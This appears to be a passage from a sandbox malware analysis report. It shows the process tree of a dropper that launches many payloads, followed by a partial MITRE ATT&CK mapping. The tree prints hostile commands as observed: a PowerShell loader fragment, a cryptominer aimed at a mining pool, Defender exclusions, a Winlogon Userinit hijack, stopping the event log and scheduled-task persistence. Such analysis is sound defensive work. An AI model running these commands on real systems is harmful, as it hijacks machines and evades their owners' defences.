[System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1392
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:1260
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 252
      4⤵
      Program crash
      PID:2288
- C:\Users\Admin\AppData\Local\Temp\Files\art33.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\art33.exe"
  2⤵
  - Executes dropped EXE
  PID:2504
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "EUJBTPMK"
    3⤵
    - Launches sc.exe
    PID:1496
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1304
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "EUJBTPMK" binpath= "C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2340
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 92
      4⤵
      Program crash
      PID:1224
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "EUJBTPMK"
    3⤵
    - Launches sc.exe
    PID:1424
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:1440
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:992
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:1432
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:688
- C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sunset1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2896
- C:\Users\Admin\AppData\Local\Temp\Files\dart.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dart.exe"
  2⤵
  - Executes dropped EXE
  PID:268
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  PID:956
- C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  PID:924
- - C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"
    3⤵
    PID:2132
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Launches sc.exe
  PID:2724
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:2472
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp783C.tmp.bat""
    3⤵
    PID:1048
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      PID:844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:564
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:452
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:1768
- C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
  2⤵
  PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3zbb3X3ububT3xbKb.exe" /f
    3⤵
    PID:2892
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3zbb3X3ububT3xbKb.exe" /f
      4⤵
      PID:1572
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:2036
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:1168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:1500
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:572
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 708
    3⤵
    - Program crash
    PID:880
- C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
  2⤵
  PID:2980
- - C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
    3⤵
    PID:1268
- C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe"
  2⤵
  PID:2624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:2564
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:1916
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  PID:2140
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:1880
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p1979614625696244291525413362 -oextracted
      4⤵
      PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
      "winhostDhcp.exe"
      4⤵
      PID:1048
  - - C:\Windows\system32\attrib.exe
      attrib +H "winhostDhcp.exe"
      4⤵
      Views/modifies file attributes
      PID:2792
- C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
  2⤵
  PID:2952
- C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
  2⤵
  PID:2720
- - C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
    3⤵
    PID:2040
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 800
    3⤵
    - Program crash
    PID:2584
- C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
  2⤵
  PID:1968
- C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"
  2⤵
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe"
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
    3⤵
    PID:1676
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\b7te9U2.bat" "
      4⤵
      PID:1728
    - - C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\agentServerComponent.exe
        
        "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet/agentServerComponent.exe"
        5⤵
        
        PID:2328
- C:\Users\Admin\AppData\Local\Temp\Files\%E9%A3%9E%E8%9B%BE%E5%B7%A5%E5%85%B7%E7%AE%B1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%E9%A3%9E%E8%9B%BE%E5%B7%A5%E5%85%B7%E7%AE%B1.exe"
  2⤵
  PID:2636
- C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"
  2⤵
  PID:396
- C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"
  2⤵
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe"
  2⤵
  PID:2784
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:964
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
  2⤵
  PID:2308
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0dehxuq.cmdline"
    3⤵
    PID:2876
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F4C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2E03.tmp"
      4⤵
      PID:2724
- - C:\Windows\system32\chcp.com
    "C:\Windows\system32\chcp.com" 437
    3⤵
    PID:3012
- C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"
  2⤵
  PID:2856
- - C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\a0538252234edd82661f55fea05df541c095a9f74368d8dca1582d797a1d084a.exe"
    3⤵
    PID:2916
- C:\Users\Admin\AppData\Local\Temp\Files\setup_wm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup_wm.exe"
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:1936
- C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
  2⤵
  PID:1740
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:1392
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:2820
- C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NINJA.exe"
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\WSCript.exe
    WSCript C:\Users\Admin\AppData\Local\Temp\SBADLH.vbs
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn SBADLH.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
      4⤵
      Creates scheduled task(s)
      PID:2672
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:1156
- C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"
  2⤵
  PID:2340
- C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Files\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707316134 "
    3⤵
    PID:780
- C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kehu.exe"
  2⤵
  PID:788
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:2392
- C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
  2⤵
  PID:1492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 48
    3⤵
    - Program crash
    PID:3160
- C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
  2⤵
  PID:3380
- C:\Users\Admin\AppData\Local\Temp\Files\more.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp585D.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:3156
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
    3⤵
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
      4⤵
      PID:3136
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3428
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD894.tmp.bat""
      4⤵
      PID:4068
    - - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        5⤵
        
        PID:3224
- C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NeonRank.exe"
  2⤵
  PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit
    3⤵
    PID:3760
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:3812
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3804
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:3096
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2808
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Compound + Injection + Emotions + Worm + Participants + Richmond 29418\Taxes.pif
      4⤵
      PID:3384
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Declare + Assured + Trap 29418\Q
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c mkdir 29418
      4⤵
      PID:3724
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 localhost
      4⤵
      Runs ping.exe
      PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\29418\Taxes.pif
      29418\Taxes.pif 29418\Q
      4⤵
      PID:3468
- C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567.exe"
  2⤵
  PID:3672
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
    3⤵
    PID:3964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:3300
- C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
  2⤵
  PID:3828
- C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
  2⤵
  PID:1872
- - C:\Users\Admin\AppData\Local\Temp\is-51L4I.tmp\Cheat.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-51L4I.tmp\Cheat.tmp" /SL5="$30320,30157316,832512,C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"
    3⤵
    PID:3960
- C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    PID:3888
  - - C:\Windows\System32\certutil.exe
      C:\Windows\System32\certutil.exe
      4⤵
      PID:2272
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3788
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  PID:3520
- - C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
    "C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe"
    3⤵
    PID:3616
- C:\Users\Admin\AppData\Local\Temp\Files\miner.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
    3⤵
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\3345e106-85d9-454f-8231-8822cd834a88.exe
    "C:\Users\Admin\AppData\Local\Temp\3345e106-85d9-454f-8231-8822cd834a88.exe"
    3⤵
    PID:4060
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup2.exe"
  2⤵
  PID:3412
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:1468
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4048
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        Creates scheduled task(s)
        
        PID:3488
- - C:\Users\Admin\AppData\Local\Temp\nsy8AD4.tmp
    C:\Users\Admin\AppData\Local\Temp\nsy8AD4.tmp
    3⤵
    PID:3140
- C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
  2⤵
  PID:3636
- C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"
  2⤵
  PID:3840
- C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\4c6358aa.exe"
  2⤵
  PID:2296
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3884
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:3932
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
  2⤵
  PID:3896
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:1816
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
  2⤵
  PID:3612
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:3232
- C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
  2⤵
  PID:3332
- C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\setup294.exe"
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\control.exe
    "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\g7CCGOwi.Cpl",
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\g7CCGOwi.Cpl",
      4⤵
      PID:3476
- C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\data64_6.exe"
  2⤵
  PID:4016
- C:\Users\Admin\AppData\Local\Temp\Files\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"
  2⤵
  PID:2808
- C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
  2⤵
  PID:1556

C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe
C:\ProgramData\qrabctnrcogv\uyzpsnbeowaz.exe
1⤵
PID:2892

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2292

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:2440

C:\Windows\system32\taskeng.exe
taskeng.exe {BBD3BD41-3757-45AE-93CB-8A1D2B244836} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
1⤵
PID:1756
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:1584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    PID:788
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Creates scheduled task(s)
      PID:2792
- C:\Users\Admin\AppData\Roaming\Windata\system.exe
  C:\Users\Admin\AppData\Roaming\Windata\system.exe
  2⤵
  PID:1156

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2984
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9103C1C92917A727F41524A8DF71A11B C
  2⤵
  PID:1664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1488

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x594
1⤵
PID:3744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

